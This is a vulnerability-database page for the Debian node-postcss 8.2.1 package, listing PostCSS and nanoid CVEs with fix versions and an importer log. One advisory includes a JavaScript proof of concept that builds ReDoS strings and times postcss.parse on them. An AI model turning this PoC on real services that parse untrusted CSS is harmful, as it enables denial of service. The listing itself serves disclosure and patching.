Staging Environment: Content and features may be unstable or change without notice.
Search for packages
Package details: pkg:deb/debian/node-postcss@8.2.1%2B~cs5.3.23-8
purl pkg:deb/debian/node-postcss@8.2.1%2B~cs5.3.23-8
Next non-vulnerable version 8.4.20+~cs8.0.23-1+deb12u1
Latest non-vulnerable version 8.4.20+~cs8.0.23-1+deb12u1
Risk 3.1
Vulnerabilities affecting this package (3)
Vulnerability Summary Fixed by
VCID-7cky-3c29-zyar
Aliases:
CVE-2021-23566
GHSA-qrpm-p2h7-hrv2
Exposure of Sensitive Information to an Unauthorized Actor in nanoid The package nanoid from 3.0.0, before 3.1.31, are vulnerable to Information Exposure via the valueOf() function which allows to reproduce the last id generated.
8.4.20+~cs8.0.23-1+deb12u1
Affected by 0 other vulnerabilities.
VCID-f8u5-8mj5-7yc6
Aliases:
CVE-2023-44270
GHSA-7fh5-64p2-3v2j
PostCSS line return parsing error An issue was discovered in PostCSS before 8.4.31. It affects linters using PostCSS to parse external Cascading Style Sheets (CSS). There may be `\r` discrepancies, as demonstrated by `@font-face{ font:(\r/*);}` in a rule. This vulnerability affects linters using PostCSS to parse external untrusted CSS. An attacker can prepare CSS in such a way that it will contains parts parsed by PostCSS as a CSS comment. After processing by PostCSS, it will be included in the PostCSS output in CSS nodes (rules, properties) despite being originally included in a comment.
8.4.20+~cs8.0.23-1+deb12u1
Affected by 0 other vulnerabilities.
VCID-s6f3-3mxh-ekfr
Aliases:
CVE-2024-55565
GHSA-mwcw-c2x4-8c55
Predictable results in nanoid generation when given non-integer values When nanoid is called with a fractional value, there were a number of undesirable effects: 1. in browser and non-secure, the code infinite loops on while (size--) 2. in node, the value of poolOffset becomes fractional, causing calls to nanoid to return zeroes until the pool is next filled 3. if the first call in node is a fractional argument, the initial buffer allocation fails with an error Version 3.3.8 and 5.0.9 are fixed.
8.4.20+~cs8.0.23-1+deb12u1
Affected by 0 other vulnerabilities.
Vulnerabilities fixed by this package (2)
Vulnerability Summary Aliases
VCID-9w43-n9cx-k7ab Regular Expression Denial of Service in postcss The npm package `postcss` from 7.0.0 and before versions 7.0.36 and 8.2.10 is vulnerable to Regular Expression Denial of Service (ReDoS) during source map parsing. CVE-2021-23368
GHSA-hwj9-h5mp-3pm3
VCID-scy5-ccf9-dygp Regular Expression Denial of Service in postcss The package postcss versions before 7.0.36 or between 8.0.0 and 8.2.13 are vulnerable to Regular Expression Denial of Service (ReDoS) via getAnnotationURL() and loadAnnotation() in lib/previous-map.js. The vulnerable regexes are caused mainly by the sub-pattern ```regex \/\*\s* sourceMappingURL=(.*) ``` ### PoC ```js var postcss = require("postcss") function build_attack(n) { var ret = "a{}" for (var i = 0; i < n; i++) { ret += "/*# sourceMappingURL=" } return ret + "!"; } ``` ```js postcss.parse('a{}/*# sourceMappingURL=a.css.map */') for (var i = 1; i <= 500000; i++) { if (i % 1000 == 0) { var time = Date.now(); var attack_str = build_attack(i) try { postcss.parse(attack_str) var time_cost = Date.now() - time; console.log("attack_str.length: " + attack_str.length + ": " + time_cost + " ms"); } catch (e) { var time_cost = Date.now() - time; console.log("attack_str.length: " + attack_str.length + ": " + time_cost + " ms"); } } } ``` CVE-2021-23382
GHSA-566m-qj78-rww5

Date Actor Action Vulnerability Source VulnerableCode Version
2026-04-16T00:20:36.862225+00:00 Debian Oval Importer Affected by VCID-7cky-3c29-zyar https://www.debian.org/security/oval/oval-definitions-bullseye.xml.bz2 38.4.0
2026-04-15T20:53:49.014356+00:00 Debian Oval Importer Affected by VCID-f8u5-8mj5-7yc6 https://www.debian.org/security/oval/oval-definitions-bullseye.xml.bz2 38.4.0
2026-04-15T20:14:27.972311+00:00 Debian Oval Importer Affected by VCID-s6f3-3mxh-ekfr https://www.debian.org/security/oval/oval-definitions-bullseye.xml.bz2 38.4.0
2026-04-15T19:18:47.337208+00:00 Debian Oval Importer Fixing VCID-9w43-n9cx-k7ab https://www.debian.org/security/oval/oval-definitions-bullseye.xml.bz2 38.4.0
2026-04-15T15:28:55.803091+00:00 Debian Oval Importer Fixing VCID-scy5-ccf9-dygp https://www.debian.org/security/oval/oval-definitions-bullseye.xml.bz2 38.4.0
2026-04-11T23:54:12.881111+00:00 Debian Oval Importer Affected by VCID-7cky-3c29-zyar https://www.debian.org/security/oval/oval-definitions-bullseye.xml.bz2 38.3.0
2026-04-11T20:34:22.715911+00:00 Debian Oval Importer Affected by VCID-f8u5-8mj5-7yc6 https://www.debian.org/security/oval/oval-definitions-bullseye.xml.bz2 38.3.0
2026-04-11T19:56:16.762069+00:00 Debian Oval Importer Affected by VCID-s6f3-3mxh-ekfr https://www.debian.org/security/oval/oval-definitions-bullseye.xml.bz2 38.3.0
2026-04-11T19:02:09.140243+00:00 Debian Oval Importer Fixing VCID-9w43-n9cx-k7ab https://www.debian.org/security/oval/oval-definitions-bullseye.xml.bz2 38.3.0
2026-04-11T15:17:01.442257+00:00 Debian Oval Importer Fixing VCID-scy5-ccf9-dygp https://www.debian.org/security/oval/oval-definitions-bullseye.xml.bz2 38.3.0
2026-04-08T23:26:05.182986+00:00 Debian Oval Importer Affected by VCID-7cky-3c29-zyar https://www.debian.org/security/oval/oval-definitions-bullseye.xml.bz2 38.1.0
2026-04-08T20:14:29.429988+00:00 Debian Oval Importer Affected by VCID-f8u5-8mj5-7yc6 https://www.debian.org/security/oval/oval-definitions-bullseye.xml.bz2 38.1.0
2026-04-08T19:38:11.814944+00:00 Debian Oval Importer Affected by VCID-s6f3-3mxh-ekfr https://www.debian.org/security/oval/oval-definitions-bullseye.xml.bz2 38.1.0
2026-04-08T18:46:36.932347+00:00 Debian Oval Importer Fixing VCID-9w43-n9cx-k7ab https://www.debian.org/security/oval/oval-definitions-bullseye.xml.bz2 38.1.0
2026-04-08T15:11:47.635723+00:00 Debian Oval Importer Fixing VCID-scy5-ccf9-dygp https://www.debian.org/security/oval/oval-definitions-bullseye.xml.bz2 38.1.0